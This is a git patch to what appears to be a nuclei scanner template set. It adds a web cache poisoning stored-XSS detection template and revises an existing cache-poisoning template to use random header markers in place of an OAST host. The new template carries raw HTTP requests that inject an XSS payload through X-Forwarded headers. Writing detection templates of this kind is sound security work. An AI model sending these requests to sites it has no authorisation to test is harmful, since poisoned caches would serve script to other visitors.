From 851ce260339fad3615023ac192b645333278184b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 17 Apr 2023 15:37:36 +0530 Subject: [PATCH] misc updates --- .../generic/cache-poisoning-xss.yaml | 36 +++++++++++++++++++ vulnerabilities/generic/cache-poisoning.yaml | 23 ++++++------ 2 files changed, 47 insertions(+), 12 deletions(-) create mode 100644 vulnerabilities/generic/cache-poisoning-xss.yaml diff --git a/vulnerabilities/generic/cache-poisoning-xss.yaml b/vulnerabilities/generic/cache-poisoning-xss.yaml new file mode 100644 index 0000000000..518c079941 --- /dev/null +++ b/vulnerabilities/generic/cache-poisoning-xss.yaml @@ -0,0 +1,36 @@ +id: cache-poisoning-xss + +info: + name: Cache Poisoning - Stored XSS + author: melbadry9,xelkomy,akincibor + severity: high + reference: + - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning + - https://portswigger.net/research/practical-web-cache-poisoning + - https://portswigger.net/web-security/web-cache-poisoning + tags: cache,generic,xss + +variables: + cache_key: "{{to_lower(rand_base(6))}}" + cache_header: "{{to_lower(rand_base(6))}}" + xss_payload: '">' + +requests: + - raw: + - | + GET /?{{cache_key}}=1 HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}} + X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}} + X-Forwarded-For: {{cache_header}}.xff{{xss_payload}} + + - | + GET /?{{cache_key}}=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - contains(body_2, cache_header) + - contains(body_2, xss_payload) + condition: and \ No newline at end of file diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml index 60371db9a2..168841fb7c 100644 --- a/vulnerabilities/generic/cache-poisoning.yaml +++ b/vulnerabilities/generic/cache-poisoning.yaml @@ -7,28 +7,27 @@ info: reference: - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - https://portswigger.net/research/practical-web-cache-poisoning + - https://portswigger.net/web-security/web-cache-poisoning tags: cache,generic +variables: + cache_key: "{{to_lower(rand_base(6))}}" + cache_header: "{{to_lower(rand_base(6))}}" + requests: - raw: - | - GET /?{{randstr}}=9 HTTP/1.1 + GET /?{{cache_key}}=9 HTTP/1.1 Host: {{Hostname}} - X-Forwarded-Prefix: prefix.cache.oast.pro - X-Forwarded-Host: host.cache.oast.pro - X-Forwarded-For: for.cache.oast.pro + X-Forwarded-Prefix: {{cache_header}}.xfp + X-Forwarded-Host: {{cache_header}}.xfh + X-Forwarded-For: {{cache_header}}.xff - | - GET /?{{randstr}}=9 HTTP/1.1 + GET /?{{cache_key}}=9 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'contains(body_2, "cache.oast.pro")' - - extractors: - - type: regex - part: response - regex: - - "(prefix|host|for).cache.oast.pro" + - 'contains(body_2, cache_header)' \ No newline at end of file